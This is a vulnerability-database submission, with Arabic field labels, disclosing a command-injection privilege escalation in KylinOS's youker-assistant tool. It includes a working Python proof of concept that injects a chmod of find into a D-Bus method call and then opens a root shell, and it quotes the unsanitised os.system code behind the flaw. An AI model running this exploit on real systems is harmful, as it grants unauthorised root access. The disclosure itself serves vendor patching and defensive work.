| عنوان | Kylin OS youker-assistant privilege escalation vulnerability |
|---|
| الوصف | Kylin OS youker-assistant privilege escalation vulnerability
Author: Set3r.Pan([email protected])
Unit: KylinSoft(https://www.kylinos.cn/)
Report
Describe
Youker-assistant is an integrated tool on KylinOS Desktop to help perform daily system maintenance tasks. There is a command injection vulnerability in this component, which may lead to privilege escalation for ordinary users.
Hazard level
High
Affected version
Desktop:youker-assistant < x.x.x.x
POC&&EXP
ISO Download:
https://distro-images.kylinos.cn:8802/web_pungi/download/share/HXDYtGjZm3daA4UvOTLkiPl1nB9ErM0c/
exploit.py
import os
import time
import dbus
import getpass
bus = dbus.SystemBus()
interface = dbus.Interface(bus.get_object('com.kylin.assistant.systemdaemon',
'/com/kylin/assistant/systemdaemon'),
'com.kylin.assistant.systemdaemon')
interface.adjust_cpufreq_scaling_governer ("123|chmod 4777 /usr/bin/find|")
time.sleep(3)
os.system('find /tmp -exec /bin/sh -p \;')
Vuln details
Vuln function:
adjust_cpufreq_scaling_governer
Vuln Type: Command Injection
vuln code:
else:
cmd = 'echo %s > %s' % (value, filepath)
os.system(cmd)
The value in the command executed by system comes from user input, which can be used for command injection. |
|---|
| المصدر | ⚠️ https://github.com/i900008/vulndb/blob/main/youker-assistant_vuln.md |
|---|
| المستخدم | Set3r.Pan (UID 28571) |
|---|
| ارسال | 11/04/2023 03:26 AM (3 سنوات منذ) |
|---|
| الاعتدال | 15/04/2023 10:40 AM (4 days later) |
|---|
| الحالة | تمت الموافقة |
|---|
| إدخال VulDB | 226099 [KylinSoft youker-assistant قبل 3.1.4.13 على KylinOS adjust_cpufreq_scaling_governer تجاوز الصلاحيات] |
|---|
| النقاط | 20 |
|---|